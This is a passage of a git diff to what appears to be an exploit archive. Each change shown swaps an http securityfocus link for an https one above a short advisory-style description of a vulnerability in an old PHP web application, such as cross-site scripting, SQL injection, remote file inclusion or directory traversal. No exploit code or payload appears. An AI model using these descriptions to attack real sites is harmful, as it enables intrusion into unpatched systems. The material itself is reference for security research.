of the news system to create and access an administrative account. This is due to insufficient validation of data supplied to account editing input fields of Newsscript. diff --git a/exploits/php/webapps/22671.txt b/exploits/php/webapps/22671.txt index 3e5a219d8..e4a712021 100644 --- a/exploits/php/webapps/22671.txt +++ b/exploits/php/webapps/22671.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7737/info +source: https://www.securityfocus.com/bid/7737/info Shoutbox is prone to directory traversal attacks. The vulnerability exists due to insufficient sanitization of user-supplied values to URI parameters. diff --git a/exploits/php/webapps/22672.txt b/exploits/php/webapps/22672.txt index ee827e372..13f554593 100644 --- a/exploits/php/webapps/22672.txt +++ b/exploits/php/webapps/22672.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7738/info +source: https://www.securityfocus.com/bid/7738/info A remote file include vulnerability has been reported for Cafelog. Due to insufficient sanitization of some user-supplied variables by the 'blogger-2-b2.php' and 'gm-2-b2.php' scripts, it is possible for a remote attacker to include a malicious PHP file in a URL. diff --git a/exploits/php/webapps/22675.txt b/exploits/php/webapps/22675.txt index 116fd2cc1..f87e260e3 100644 --- a/exploits/php/webapps/22675.txt +++ b/exploits/php/webapps/22675.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7742/info +source: https://www.securityfocus.com/bid/7742/info Geeklog is reported to be prone to SQL injection attacks during authentication. This is due to insufficient sanitization of cookie values, which could permit an attacker to inject SQL code. This issue could be exploited to compromise Geeklog or to potentially launch attacks against the database, allowing for disclosure of sensitive information or other consequences. diff --git a/exploits/php/webapps/22687.pl b/exploits/php/webapps/22687.pl index dc4d02035..339199145 100755 --- a/exploits/php/webapps/22687.pl +++ b/exploits/php/webapps/22687.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7746/info +source: https://www.securityfocus.com/bid/7746/info Shoutbox is prone to an issue that may result in the execution of attacker-supplied code. The vulnerability exists due to insufficient sanitization of the 'conf' URI parameter. diff --git a/exploits/php/webapps/22693.txt b/exploits/php/webapps/22693.txt index c3852d409..fbc7399bd 100644 --- a/exploits/php/webapps/22693.txt +++ b/exploits/php/webapps/22693.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7758/info +source: https://www.securityfocus.com/bid/7758/info It has been reported that cPanel is prone to an issue where a remote attacker may bypass cPanel Formail-clone local domain checks and have untrusted e-mail delivered in the context of the vulnerable host. diff --git a/exploits/php/webapps/22702.pl b/exploits/php/webapps/22702.pl index 1c729f5c5..4f769467b 100755 --- a/exploits/php/webapps/22702.pl +++ b/exploits/php/webapps/22702.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7772/info +source: https://www.securityfocus.com/bid/7772/info Shoutbox is prone to an issue that may result in the execution of attacker-supplied code. The vulnerability exists due to insufficient sanitization of input into the expanded.php script. diff --git a/exploits/php/webapps/22704.txt b/exploits/php/webapps/22704.txt index 16a1c642c..4e9521eb1 100644 --- a/exploits/php/webapps/22704.txt +++ b/exploits/php/webapps/22704.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7774/info +source: https://www.securityfocus.com/bid/7774/info Webchat has been reported prone to a path disclosure weakness. diff --git a/exploits/php/webapps/22705.txt b/exploits/php/webapps/22705.txt index 05d869d72..9578e891c 100644 --- a/exploits/php/webapps/22705.txt +++ b/exploits/php/webapps/22705.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7775/info +source: https://www.securityfocus.com/bid/7775/info A problem in Shoutbox may result in traversal attacks. The vulnerability exists due to insufficient sanitization of user-supplied values to the expanded.php script, and could allow the viewing of potentially sensitive files by attackers. diff --git a/exploits/php/webapps/22715.txt b/exploits/php/webapps/22715.txt index 854350e92..fd7aeb5e3 100644 --- a/exploits/php/webapps/22715.txt +++ b/exploits/php/webapps/22715.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7777/info +source: https://www.securityfocus.com/bid/7777/info WebChat has been reported prone to a database username disclosure weakness. diff --git a/exploits/php/webapps/22716.txt b/exploits/php/webapps/22716.txt index 13050dfcd..25795001b 100644 --- a/exploits/php/webapps/22716.txt +++ b/exploits/php/webapps/22716.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7779/info +source: https://www.securityfocus.com/bid/7779/info WebChat has been reported prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/22717.txt b/exploits/php/webapps/22717.txt index 67ade0508..d39a2ea19 100644 --- a/exploits/php/webapps/22717.txt +++ b/exploits/php/webapps/22717.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7780/info +source: https://www.securityfocus.com/bid/7780/info SPChat has been reported prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/22725.txt b/exploits/php/webapps/22725.txt index 79ad82dc3..30f2c4a49 100644 --- a/exploits/php/webapps/22725.txt +++ b/exploits/php/webapps/22725.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7805/info +source: https://www.securityfocus.com/bid/7805/info Scripts that include the PHP phpinfo() debugging function may be prone to cross-site scripting attacks. This could permit remote attackers to create a malicious link to a vulnerable PHP script that includes hostile client-side script code or HTML. If this link is visited, the attacker-supplied code may be rendered in the browser of the user who visit the malicious link. diff --git a/exploits/php/webapps/22750.txt b/exploits/php/webapps/22750.txt index 3c9db7b82..c8ffe2865 100644 --- a/exploits/php/webapps/22750.txt +++ b/exploits/php/webapps/22750.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7843/info +source: https://www.securityfocus.com/bid/7843/info A remote file include vulnerability has been reported for Zentrack. Due to insufficient sanitization of some user-supplied variables by the 'index.php' script, it is possible for a remote attacker to include a malicious PHP file in a URL. diff --git a/exploits/php/webapps/22760.txt b/exploits/php/webapps/22760.txt index 59a925912..5da444f57 100644 --- a/exploits/php/webapps/22760.txt +++ b/exploits/php/webapps/22760.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7896/info +source: https://www.securityfocus.com/bid/7896/info Sphera HostingDirector VDS Control Panel has been reported prone to a vulnerability where an attacker may make arbitrary account configuration modifications. diff --git a/exploits/php/webapps/22761.txt b/exploits/php/webapps/22761.txt index 45fa14354..0e1a501bf 100644 --- a/exploits/php/webapps/22761.txt +++ b/exploits/php/webapps/22761.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7898/info +source: https://www.securityfocus.com/bid/7898/info The PostNuke 'modules.php' script does not sufficiently sanitize data supplied via URI parameters, making it prone to cross-site scripting attacks. This could allow for execution of hostile HTML and script code in the web client of a user who visits a web page that contains the malicious code. diff --git a/exploits/php/webapps/22762.txt b/exploits/php/webapps/22762.txt index e124fc72c..6599ade60 100644 --- a/exploits/php/webapps/22762.txt +++ b/exploits/php/webapps/22762.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7899/info +source: https://www.securityfocus.com/bid/7899/info Sphera HostingDirector VDS Control Panel has been reported prone to several cross-site scripting attacks. The vulnerabilities exist due to insufficient sanitization of user-supplied input for certain URI parameters. diff --git a/exploits/php/webapps/22767.txt b/exploits/php/webapps/22767.txt index 5a15ec46a..037cae473 100644 --- a/exploits/php/webapps/22767.txt +++ b/exploits/php/webapps/22767.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7901/info +source: https://www.securityfocus.com/bid/7901/info The PostNuke 'user.php' script does not sufficiently sanitize data supplied via URI parameters, making it prone to cross-site scripting attacks. This could allow for execution of hostile HTML and script code in the web client of a user who visits a web page that contains the malicious code. diff --git a/exploits/php/webapps/22776.txt b/exploits/php/webapps/22776.txt index e418cb75f..2239d50c6 100644 --- a/exploits/php/webapps/22776.txt +++ b/exploits/php/webapps/22776.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7919/info +source: https://www.securityfocus.com/bid/7919/info It has been reported that PMachine does not properly handle include files under some circumstances. Because of this, an attacker may be able to remotely execute commands. diff --git a/exploits/php/webapps/22791.txt b/exploits/php/webapps/22791.txt index 57d26c00f..b93597946 100644 --- a/exploits/php/webapps/22791.txt +++ b/exploits/php/webapps/22791.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7952/info +source: https://www.securityfocus.com/bid/7952/info Multiple vulnerabilities have been reported for Squirrelmail which could allow for information disclosure, data corruption, and privilege escalation. diff --git a/exploits/php/webapps/22792.txt b/exploits/php/webapps/22792.txt index f9bae1299..60da334d6 100644 --- a/exploits/php/webapps/22792.txt +++ b/exploits/php/webapps/22792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7952/info +source: https://www.securityfocus.com/bid/7952/info Multiple vulnerabilities have been reported for Squirrelmail which could allow for information disclosure, data corruption, and privilege escalation. diff --git a/exploits/php/webapps/22793.txt b/exploits/php/webapps/22793.txt index 88577bcda..1923d88e7 100644 --- a/exploits/php/webapps/22793.txt +++ b/exploits/php/webapps/22793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7952/info +source: https://www.securityfocus.com/bid/7952/info Multiple vulnerabilities have been reported for Squirrelmail which could allow for information disclosure, data corruption, and privilege escalation. diff --git a/exploits/php/webapps/22798.txt b/exploits/php/webapps/22798.txt index 88c6320d8..2224b81d3 100644 --- a/exploits/php/webapps/22798.txt +++ b/exploits/php/webapps/22798.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7963/info +source: https://www.securityfocus.com/bid/7963/info A vulnerability has been reported for phpMyAdmin that may reveal the contents of directories to remote attackers. The vulnerability exists due to insufficient sanitization of user-supplied input. Specifically, dot-dot-slash '../' directory traversal sequences are not sufficiently sanitized from URI parameters. diff --git a/exploits/php/webapps/22808.txt b/exploits/php/webapps/22808.txt index de2fa867c..55f1bbba4 100644 --- a/exploits/php/webapps/22808.txt +++ b/exploits/php/webapps/22808.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7980/info +source: https://www.securityfocus.com/bid/7980/info It has been reported that pMachine is prone to remote a patch disclosure vulnerability when accessing various scripts. diff --git a/exploits/php/webapps/22809.txt b/exploits/php/webapps/22809.txt index 9aa80e287..f3b03b0f6 100644 --- a/exploits/php/webapps/22809.txt +++ b/exploits/php/webapps/22809.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7980/info +source: https://www.securityfocus.com/bid/7980/info It has been reported that pMachine is prone to remote a patch disclosure vulnerability when accessing various scripts. diff --git a/exploits/php/webapps/22810.txt b/exploits/php/webapps/22810.txt index 3027e213e..00a8645dc 100644 --- a/exploits/php/webapps/22810.txt +++ b/exploits/php/webapps/22810.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7981/info +source: https://www.securityfocus.com/bid/7981/info Reportedly, pMachine is vulnerable to a cross-site scripting attack. The vulnerability is present in the search module. The issue presents itself likely due to insufficient sanitization performed on user-supplied data that is passed as the query to the affected module. diff --git a/exploits/php/webapps/22812.txt b/exploits/php/webapps/22812.txt index 955065d97..c867a9039 100644 --- a/exploits/php/webapps/22812.txt +++ b/exploits/php/webapps/22812.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7995/info +source: https://www.securityfocus.com/bid/7995/info A vulnerability has been reported for Filemanager that may result in the disclosure of arbitrary files. The vulnerability exists due to insufficient sanitization of user-supplied values for URI parameters. diff --git a/exploits/php/webapps/22818.txt b/exploits/php/webapps/22818.txt index 7cd78abe5..10fbf97bd 100644 --- a/exploits/php/webapps/22818.txt +++ b/exploits/php/webapps/22818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8011/info +source: https://www.securityfocus.com/bid/8011/info It has been reported that Tutos does not properly handle input to the file_select script. Because of this, an attacker may be able to execute code in the browser of another user with the privileges of the vulnerable site. diff --git a/exploits/php/webapps/22819.txt b/exploits/php/webapps/22819.txt index ff3d18d42..beca9a11c 100644 --- a/exploits/php/webapps/22819.txt +++ b/exploits/php/webapps/22819.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8012/info +source: https://www.securityfocus.com/bid/8012/info It has been reported that Tutos does not properly handle input to the file_new script. Because of this, an attacker may be able to upload arbitrary files to a vulnerable site. diff --git a/exploits/php/webapps/22820.txt b/exploits/php/webapps/22820.txt index 2abf578cf..54456557f 100644 --- a/exploits/php/webapps/22820.txt +++ b/exploits/php/webapps/22820.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8013/info +source: https://www.securityfocus.com/bid/8013/info XMB Forum has been reported prone to multiple cross-site scripting and HTML-injection vulnerabilities because the application fails to sanitize user-supplied data. diff --git a/exploits/php/webapps/22821.txt b/exploits/php/webapps/22821.txt index 672263b3d..70264048c 100644 --- a/exploits/php/webapps/22821.txt +++ b/exploits/php/webapps/22821.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8013/info +source: https://www.securityfocus.com/bid/8013/info XMB Forum has been reported prone to multiple cross-site scripting and HTML-injection vulnerabilities because the application fails to sanitize user-supplied data. diff --git a/exploits/php/webapps/22826.txt b/exploits/php/webapps/22826.txt index e8c8bc369..d0e19ac05 100644 --- a/exploits/php/webapps/22826.txt +++ b/exploits/php/webapps/22826.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8018/info +source: https://www.securityfocus.com/bid/8018/info VisNetic WebMail is prone to an information disclosure vulnerability. Reportedly, by appending a dot '.' character to the end of a URI request to WebMail, the source code of PHP files may be returned in the web browser. diff --git a/exploits/php/webapps/22841.txt b/exploits/php/webapps/22841.txt index b9017b984..c628b00bd 100644 --- a/exploits/php/webapps/22841.txt +++ b/exploits/php/webapps/22841.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8046/info +source: https://www.securityfocus.com/bid/8046/info A vulnerability has been reported for iXmail that may allow for the deletion of files. The vulnerability occurs due to insufficient sanitization of user-supplied input for certain URI parameters. diff --git a/exploits/php/webapps/22842.txt b/exploits/php/webapps/22842.txt index 58d26fcfb..845115406 100644 --- a/exploits/php/webapps/22842.txt +++ b/exploits/php/webapps/22842.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8060/info +source: https://www.securityfocus.com/bid/8060/info CutePHP is prone to HTML injection attacks. The vulnerability exists due to insufficient sanitization of user-supplied input. Specifically, user-supplied input to news posts are not sufficiently sanitized of malicious HTML code. diff --git a/exploits/php/webapps/22845.txt b/exploits/php/webapps/22845.txt index f040889d5..0e82bbc1d 100644 --- a/exploits/php/webapps/22845.txt +++ b/exploits/php/webapps/22845.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8067/info +source: https://www.securityfocus.com/bid/8067/info paBox is prone to an issue that may allow unauthenticated remote users to reset administrative passwords. This could permit unauthorized access to the administrative Control Panel. diff --git a/exploits/php/webapps/22874.txt b/exploits/php/webapps/22874.txt index 6a8640292..b16af5451 100644 --- a/exploits/php/webapps/22874.txt +++ b/exploits/php/webapps/22874.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8119/info +source: https://www.securityfocus.com/bid/8119/info cPanel is prone to an HTML injection vulnerability. It is possible for remote attacks to include hostile HTML and script code in requests to cPanel, which will be logged. When logs are viewed by an administrative user, the injected code could be rendered in their browser in the context of the site hosting cPanel. diff --git a/exploits/php/webapps/22886.txt b/exploits/php/webapps/22886.txt index 2ed719165..89fe2317d 100644 --- a/exploits/php/webapps/22886.txt +++ b/exploits/php/webapps/22886.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8155/info +source: https://www.securityfocus.com/bid/8155/info It has been reported that a problem in ChangshinSoft ezTrans Server exists in the download.php script that may allow an attacker to view arbitrary files. This may result in the disclosure of potentially sensitive information. diff --git a/exploits/php/webapps/22887.txt b/exploits/php/webapps/22887.txt index b1bf2e92a..fa6c1ae37 100644 --- a/exploits/php/webapps/22887.txt +++ b/exploits/php/webapps/22887.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8158/info +source: https://www.securityfocus.com/bid/8158/info phpForum is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. This could be exploited to execute malicious PHP commands in the context of the web server process. diff --git a/exploits/php/webapps/22896.txt b/exploits/php/webapps/22896.txt index cbc982965..3dfdb3a04 100644 --- a/exploits/php/webapps/22896.txt +++ b/exploits/php/webapps/22896.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8174/info +source: https://www.securityfocus.com/bid/8174/info A vulnerability has been reported in htmltonuke that may result in web code execution in the browser of visiting users. This code would be executed in the security context of the site hosting the vulnerable script. diff --git a/exploits/php/webapps/22901.txt b/exploits/php/webapps/22901.txt index 6e17dcfd5..5cf874a80 100644 --- a/exploits/php/webapps/22901.txt +++ b/exploits/php/webapps/22901.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8188/info +source: https://www.securityfocus.com/bid/8188/info It has been alleged that BlazeBoard fails to adequately protect the contents of a directory in a default install. It is therefore possible for remote users to request files from this directory. This could expose sensitive information stored in these directories to remote attackers. diff --git a/exploits/php/webapps/22910.html b/exploits/php/webapps/22910.html index cd4a03ce8..5d6eec855 100644 --- a/exploits/php/webapps/22910.html +++ b/exploits/php/webapps/22910.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8198/info +source: https://www.securityfocus.com/bid/8198/info Splatt Forum has been reported prone to a HTML injection vulnerability. diff --git a/exploits/php/webapps/22922.txt b/exploits/php/webapps/22922.txt index a8894244c..7203c734c 100644 --- a/exploits/php/webapps/22922.txt +++ b/exploits/php/webapps/22922.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8212/info +source: https://www.securityfocus.com/bid/8212/info Ultimate Bulletin Board has been reported prone to a HTML injection vulnerability. diff --git a/exploits/php/webapps/22925.txt b/exploits/php/webapps/22925.txt index 7e9731fe8..5118b78a7 100644 --- a/exploits/php/webapps/22925.txt +++ b/exploits/php/webapps/22925.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8220/info +source: https://www.securityfocus.com/bid/8220/info eStore is prone to a path disclosure vulnerability. diff --git a/exploits/php/webapps/22927.txt b/exploits/php/webapps/22927.txt index 45f4c8110..9d9b0c02c 100644 --- a/exploits/php/webapps/22927.txt +++ b/exploits/php/webapps/22927.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8227/info +source: https://www.securityfocus.com/bid/8227/info SimpNews is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. Remote users, under some PHP configurations, may influence a Simpnews URI variable. This variable is used in the include path for several SimpNews configuration scripts. By influencing the include path so that it points to a malicious PHP script on a remote system, it is possible to cause arbitrary PHP code to be executed. diff --git a/exploits/php/webapps/22940.txt b/exploits/php/webapps/22940.txt index aa1134533..28e1fd9ec 100644 --- a/exploits/php/webapps/22940.txt +++ b/exploits/php/webapps/22940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8235/info +source: https://www.securityfocus.com/bid/8235/info The Drupal content management system is prone to a cross-site scripting vulnerability. This issue is exposed through the main page and through other sub-pages. An attacker may exploit this issue by including hostile HTML and script code in a malicious link to Drupal. This code may be rendered in the web browser of a user who visits the link. diff --git a/exploits/php/webapps/22941.txt b/exploits/php/webapps/22941.txt index 1cccdb592..82ed8dafd 100644 --- a/exploits/php/webapps/22941.txt +++ b/exploits/php/webapps/22941.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8236/info +source: https://www.securityfocus.com/bid/8236/info It has been reported that attackers may be able to modify the 'location' variable passed to the index.php file to cause the Web server to return arbitrary files. This script is prone to a directory traversal vulnerability, allowing attackers to retrieve any file residing on the filesystem readable by the Web server user. diff --git a/exploits/php/webapps/22942.txt b/exploits/php/webapps/22942.txt index bdfbb3aaa..08c43a945 100644 --- a/exploits/php/webapps/22942.txt +++ b/exploits/php/webapps/22942.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8237/info +source: https://www.securityfocus.com/bid/8237/info It has been reported that an information disclosure issue exists in WebCalendar. This may allow an attacker to gain unauthorized read access to potentially sensitive information with the privileges of the web server process. diff --git a/exploits/php/webapps/22948.txt b/exploits/php/webapps/22948.txt index 13b466df7..242f080bb 100644 --- a/exploits/php/webapps/22948.txt +++ b/exploits/php/webapps/22948.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8249/info +source: https://www.securityfocus.com/bid/8249/info moregroupware is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. Remote users, under some PHP configurations, may influence a moregroupware URI variable. This variable is used in the include path for several moregroupware configuration scripts. By influencing the include path so that it points to a malicious PHP script on a remote system, it is possible to cause arbitrary PHP code to be executed. diff --git a/exploits/php/webapps/22953.txt b/exploits/php/webapps/22953.txt index 952816653..f7c3491ad 100644 --- a/exploits/php/webapps/22953.txt +++ b/exploits/php/webapps/22953.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8270/info +source: https://www.securityfocus.com/bid/8270/info PHP-Gastebuch has been reported prone to multiple information disclosure vulnerabilities. The issue presents itself because the affected software fails to sufficiently control access to sensitive files contained in the PHP-Gastebuch installation. diff --git a/exploits/php/webapps/22955.html b/exploits/php/webapps/22955.html index bab9f2e46..2982fdfbb 100644 --- a/exploits/php/webapps/22955.html +++ b/exploits/php/webapps/22955.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8271/info +source: https://www.securityfocus.com/bid/8271/info It has been reported that a script contained in paFileDB does not properly verify user credentials before accepting files for upload. As a result, remote attackers may be able to upload files to the Web server. After a file has been uploaded, it may be possible for the attacker to execute the file remotely. diff --git a/exploits/php/webapps/22956.txt b/exploits/php/webapps/22956.txt index 3f9265ba0..433eda781 100644 --- a/exploits/php/webapps/22956.txt +++ b/exploits/php/webapps/22956.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8273/info +source: https://www.securityfocus.com/bid/8273/info e107 Website System 'db.php' has been reported prone to an information disclosure vulnerability. diff --git a/exploits/php/webapps/22958.txt b/exploits/php/webapps/22958.txt index 24af59ec0..2babc7069 100644 --- a/exploits/php/webapps/22958.txt +++ b/exploits/php/webapps/22958.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8279/info +source: https://www.securityfocus.com/bid/8279/info The e107 content management system is prone to an HTML injection vulnerability. This issue is exposed through the class2.php script. An attacker may exploit this issue by including hostile HTML and script code in certain fields within the form. This code may be rendered in the web browser of a user who views the site. diff --git a/exploits/php/webapps/22960.txt b/exploits/php/webapps/22960.txt index 91f3dbcf8..48f547f8b 100644 --- a/exploits/php/webapps/22960.txt +++ b/exploits/php/webapps/22960.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8286/info +source: https://www.securityfocus.com/bid/8286/info PBLang is prone to an HTML injection vulnerability. An attacker may exploit this issue by including hostile HTML and script code encapsulated in PBLang tags, when posting to the bulletin board. Attacker supplied code may be rendered in the web browser of a user who views these areas of the site. This would occur in the security context of the site hosting PBLang. diff --git a/exploits/php/webapps/22961.txt b/exploits/php/webapps/22961.txt index a04c57b09..b006568a1 100644 --- a/exploits/php/webapps/22961.txt +++ b/exploits/php/webapps/22961.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8288/info +source: https://www.securityfocus.com/bid/8288/info Gallery is prone to a cross-site scripting vulnerability. This issue is present in the search engine facility provided by the software. An attacker could exploit this issue by constructing a malicious link to the search engine that contains hostile HTML and script code. Attacker-supplied code could be rendered in the browser of a user who follows such a link. diff --git a/exploits/php/webapps/22977.txt b/exploits/php/webapps/22977.txt index b07e823df..afa090bed 100644 --- a/exploits/php/webapps/22977.txt +++ b/exploits/php/webapps/22977.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8321/info +source: https://www.securityfocus.com/bid/8321/info MOD Guthabenhack For Woltlab Burning Board reported prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/22986.txt b/exploits/php/webapps/22986.txt index 9f58e134b..8ffab9c85 100644 --- a/exploits/php/webapps/22986.txt +++ b/exploits/php/webapps/22986.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8339/info +source: https://www.securityfocus.com/bid/8339/info It is possible to create an authentication or access control page, using Dreamweaver MX PHP Authentication Suite. This script will generate an error page that contains dynamic content when a user fails to authenticate correctly to the site. diff --git a/exploits/php/webapps/22990.txt b/exploits/php/webapps/22990.txt index f693b0ed6..40e9c2f1e 100644 --- a/exploits/php/webapps/22990.txt +++ b/exploits/php/webapps/22990.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8354/info +source: https://www.securityfocus.com/bid/8354/info vBulletin may be prone to an HTML injection vulnerability. This issue is exposed through inadequate sanitization of user input for certain fields within the register.php script. An attacker may exploit this issue by including hostile HTML and script code in fields that may be displayed in posts to the message board, or the user's profile. This code may be rendered in the web browser of a user who views the malicious message. diff --git a/exploits/php/webapps/22995.txt b/exploits/php/webapps/22995.txt index c54b5b594..e2a1b6448 100644 --- a/exploits/php/webapps/22995.txt +++ b/exploits/php/webapps/22995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8368/info +source: https://www.securityfocus.com/bid/8368/info C-Cart is prone to a path disclosure vulnerability. Passing invalid data as a URI parameter to several C-Cart scripts will cause an error message to be displayed, which contains installation path information. diff --git a/exploits/php/webapps/22997.txt b/exploits/php/webapps/22997.txt index 27203e333..469d7bcda 100644 --- a/exploits/php/webapps/22997.txt +++ b/exploits/php/webapps/22997.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8374/info +source: https://www.securityfocus.com/bid/8374/info It has been reported that a cross site scripting vulnerability exists in the Downlaods and Web_Links modules of PostNuke. It is possible that an attacker may construct a link containing malicious script code that could be executed in a browser of a user who visits the link. diff --git a/exploits/php/webapps/22998.txt b/exploits/php/webapps/22998.txt index a1e260f43..e4524226c 100644 --- a/exploits/php/webapps/22998.txt +++ b/exploits/php/webapps/22998.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8374/info +source: https://www.securityfocus.com/bid/8374/info It has been reported that a cross site scripting vulnerability exists in the Downlaods and Web_Links modules of PostNuke. It is possible that an attacker may construct a link containing malicious script code that could be executed in a browser of a user who visits the link. diff --git a/exploits/php/webapps/23000.txt b/exploits/php/webapps/23000.txt index 62f06866a..69e0a3733 100644 --- a/exploits/php/webapps/23000.txt +++ b/exploits/php/webapps/23000.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8380/info +source: https://www.securityfocus.com/bid/8380/info geeeekShop is prone to multiple information disclosure vulnerabilities. Passing invalid data as URI parameters to geeeekShop scripts, will cause an error message to be displayed, which contains installation path information. Additionally it has been reported that a remote attacker may access site configuration scripts, which may lead to the disclosure of potentially sensitive information. diff --git a/exploits/php/webapps/23001.txt b/exploits/php/webapps/23001.txt index 78fdf14b7..dc8b5948f 100644 --- a/exploits/php/webapps/23001.txt +++ b/exploits/php/webapps/23001.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8381/info +source: https://www.securityfocus.com/bid/8381/info Invision Power Board admin.php script reported prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/23008.txt b/exploits/php/webapps/23008.txt index d403eb72e..22dc9d7d3 100644 --- a/exploits/php/webapps/23008.txt +++ b/exploits/php/webapps/23008.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8384/info +source: https://www.securityfocus.com/bid/8384/info DCForum+ is prone to an HTML injection vulnerability. An attacker may exploit this issue by including hostile HTML and script code in the subject field of posts to the bulletin board. This is because the script that processes posts does not sufficiently sanitize user input, allowing attackers to embed HTML and script commands within the post. This code may be rendered in the web browser of a user who views these areas of the site. This would occur in the security context of the site hosting DCForum+. diff --git a/exploits/php/webapps/23009.txt b/exploits/php/webapps/23009.txt index b34900a4f..26493b688 100644 --- a/exploits/php/webapps/23009.txt +++ b/exploits/php/webapps/23009.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8385/info +source: https://www.securityfocus.com/bid/8385/info Stellar Docs will disclose path information in an error page in response to a request for an invalid request for a web resource. This could disclose information that could be useful in further attacks against the system. It should be noted the error output indicates that a database function has failed, which may be due to a more serious issue, such as SQL injection. diff --git a/exploits/php/webapps/23010.txt b/exploits/php/webapps/23010.txt index 503a0883a..dd5562381 100644 --- a/exploits/php/webapps/23010.txt +++ b/exploits/php/webapps/23010.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8386/info +source: https://www.securityfocus.com/bid/8386/info It has been reported that Better Basket Pro (BBPro) Store Builder may reveal path information under some circumstances. This may result a directed attack against system resources. diff --git a/exploits/php/webapps/23011.txt b/exploits/php/webapps/23011.txt index 6eb257a26..c8e5b3865 100644 --- a/exploits/php/webapps/23011.txt +++ b/exploits/php/webapps/23011.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8388/info +source: https://www.securityfocus.com/bid/8388/info A cross-site scripting vulnerability has been reported in the index.php script of PHPOutSourcing Zorum. Because of this, an attacker may be able to execute HTML and script code in the browsers of target users in the security context of the site hosting the vulnerable script. diff --git a/exploits/php/webapps/23012.txt b/exploits/php/webapps/23012.txt index 06d4fc1bd..a124ad33f 100644 --- a/exploits/php/webapps/23012.txt +++ b/exploits/php/webapps/23012.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8389/info +source: https://www.securityfocus.com/bid/8389/info News Wizard will disclose path information in an error page in response to a request for an invalid request for a web resource. This could disclose information that could be useful in further attacks against the system. diff --git a/exploits/php/webapps/23013.txt b/exploits/php/webapps/23013.txt index 1e37c5c46..532a8f462 100644 --- 